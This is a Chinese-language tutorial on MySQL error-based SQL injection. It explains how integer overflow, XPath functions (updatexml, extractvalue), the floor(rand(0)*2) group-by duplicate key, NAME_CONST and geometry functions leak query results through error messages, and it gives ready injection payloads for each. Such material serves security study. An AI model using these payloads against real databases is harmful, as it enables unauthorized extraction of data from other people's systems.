SQL报错注入就是利用数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。
这种手段在联合查询受限且能返回错误信息的情况下比较好用,毕竟用盲注的话既耗时又容易被封。
MYSQL报错注入个人认为大体可以分为以下几类:
- BIGINT等数据类型溢出
- xpath语法错误
- concat+rand()+group_by()导致主键重复
- 一些特性
下面就针对这几种错误类型看看背后的原理是怎样的。
1. 数据溢出
这里可以看到mysql是怎么处理整形的:Integer Types (Exact Value),如下表:
Type | Storage (Bytes) | Minimum Value Signed | Minimum Value Unsigned | Maximum Value Signed | Maximum Value Unsigned |
---|---|---|---|---|---|
TINYINT | 1 | -128 | 0 | 127 | 255 |
SMALLINT | 2 | -32768 | 0 | 32767 | 65535 |
MEDIUMINT | 3 | -8388608 | 0 | 8388607 | 16777215 |
INT | 4 | -2147483648 | 0 | 2147483647 | 4294967295 |
BIGINT | 8 | -9223372036854775808 | 0 | 9223372036854775807 | 18446744073709551615 |
在mysql5.5之前,整形溢出是不会报错的,根据官方文档说明out-of-range-and-overflow,只有版本号大于5.5.5时,才会报错。试着对最大数做加法运算,可以看到报错的具体情况:
1 | select 18446744073709551615+1; |
在mysql中,要使用这么大的数,并不需要输入这么长的数字进去,使用按位取反运算运算即可:
1 | select ~0; |
我们知道,如果一个查询成功返回,则其返回值为0,进行逻辑非运算后可得1,这个值是可以进行数学运算的:
1 | select (select * from (select user())x); |
同理,利用exp函数也会产生类似的溢出错误:
1 | select exp(709); |
注入姿势:
1 | select exp(~(select*from(select user())x)); |
利用这一特性,再结合之前说的溢出报错,就可以进行注入了。这里需要说一下,经笔者测试,发现在mysql5.5.47可以在报错中返回查询结果:
1 | select (select(!x-~0)from(select(select user())x)a); |
而在mysql>5.5.53时,则不能返回查询结果
1 | select (select(!x-~0)from(select(select user())x)a); |
此外,报错信息是有长度限制的,在mysql/my_error.c中可以看到:
1 | /* Max length of a error message. Should be |
2. xpath语法错误
从 mysql5.1.5 开始提供两个XML查询和修改的函数,extractvalue和updatexml。
extractvalue负责在xml文档中按照xpath语法查询节点内容,updatexml则负责修改查询到的内容:
1 | select extractvalue(1,'/a/b'); |
它们的第二个参数都要求是符合xpath语法的字符串,如果不满足要求,则会报错,并且将查询结果放在报错信息里:
1 | select updatexml(1,concat(0x7e,(select @@version),0x7e),1); |
3. 主键重复
相关函数
- rand():产生一个 0~1 的随机数
- floor():向下取整
- floor(rand(0)*2)):原本 floor(rand(0)) 得到固定的0,但乘以2 后得到的就是不固定的 0 或者 1
这里利用到了count()和group by在遇到rand()产生的重复值时报错的思路。网上比较常见的payload是这样的:
1 | select count(*) from test group by concat(version(),floor(rand(0)*2)); |
可以看到错误类型是duplicate entry,即主键重复。实际上只要是count,rand(),group by三个连用就会造成这种报错,与位置无关:
1 | select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x; |
这种报错方法的本质是因为floor(rand(0)*2)的重复性,导致group by语句出错。group by key的原理是循环读取数据的每一行,将结果保存于临时表中。读取每一行的key时,如果key存在于临时表中,则不在临时表中更新临时表的数据;如果key不在临时表中,则在临时表中插入key所在行的数据。举个例子,表中数据如下:
1 | select * from test; |
我们以select count(*) from test group by name
语句说明大致过程如下:
先是建立虚拟表,其中key为主键,不可重复:
key count(*) 开始查询数据,去数据库数据,然后查看虚拟表是否存在,不存在则插入新记录,存在则count(*)字段直接加1:
key count(*) jack 1 key count(*) jack 1+1 key count(*) jack 1+1 tom 1 key count(*) jack 1+1 tom 1 candy 1
当这个操作遇到 rand(0)*2 时,就会发生错误,其原因在于rand()函数使用了随机种子 0,得到的是一个稳定的序列,也就是说每次以0作为随机种子得到的序列是一样的。
同理,floor(rand(0)*2)则会固定得到序列(这个很重要),假设我们得到的序列是 011011..
1 | select floor(rand(0)*2) from test; |
回到之前的group by语句上,我们将其改为select count(*) from test group by floor(rand(0)*2)
,看看每一步是什么情况:
- 语句执行的时候建立一个虚拟表,整个工作流程大致如下:开始查询数据时,读取数据库数据,查看虚拟表中是否存在,不存在则插入新纪录,存在则 count(*) 直接加 1。 假设 floor(rand(0)*2) 得到的固定序列是 011011…
- 先创建一个虚拟表
key count(*) - 取第一条记录,执行 floor(rand(0)*2),发现结果为0(第一次计算),查询虚拟表,发现 0 的键值不存在,则 floor(rand(0)*2) 会被再会计算一次,结果为1(第二次计算),插入虚表
key count(*) 1 1 - 查第二条记录,再次计算 floor(rand(0)2),发现结果为1(第三次计算),查询虚表,发现键值 1 存在,所以此时不在计算第二次,直接count()值加1,如下:
key count(*) 1 2(1+1) - 查第三条记录,再次计算floor(rand(0)*2),发现结果为0(第四次计算),发现键值没有0,则尝试插入记录,此时会又一次计算floor(rand(0)*2),结果1(第5次计算)当作虚表的主键,而此时1这个主键已经存在于虚表中了,所以在插入的时候就会报主键重复的错误了。
- 最终报错的结果,即主键’1’重复:
1
2select count(*) from test group by floor(rand(0)*2);
ERROR 1062 (23000): Duplicate entry '1' for key '<group_key>'
整个查询过程中,floor(rand(0)*2)被计算了5次,查询原始数据表3次,所以表中需要至少3条数据才能报错。关于这个rand()的问题,官方文档在这里有个说明:
1 | RAND() in a WHERE clause is evaluated for every row (when selecting from one table) or combination of rows (when selecting from a multiple-table join). Thus, for optimizer purposes, RAND() is not a constant value and cannot be used for index optimizations. |
如果有一个序列开头时 0,1,0,0 或者 1,0,1,1 则无论如何都不会报错了,因为虚表开头两个主键会分别是 0 和 1,后面的就直接count(*)加1了
4. 一些特性
4.1 列名重复
mysql列名重复会报错,我们利用 name_const 来制造一个列:
1 | select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x; |
根据官方文档,name_const函数要求参数必须是常量,所以实际使用上还没找到什么比较好的利用方式。
利用这个特性加上join函数可以爆列名:
1 | select * from(select * from test a join test b)c; |
4.2 几何函数
mysql有些几何函数,例如geometrycollection(),multipoint(),polygon(),multipolygon(),linestring(),multilinestring(),这些函数对参数要求是形如(1 2,3 3,2 2 1)这样几何数据,如果不满足要求,则会报错。经测试,在版本号为5.5.47上可以用来注入,而在5.7.17上则不行:
1 | 5.5.47 |
————————————————
本文主要参考先知社区 的文章 MYSQL报错注入的一点总结,仅作些许修改。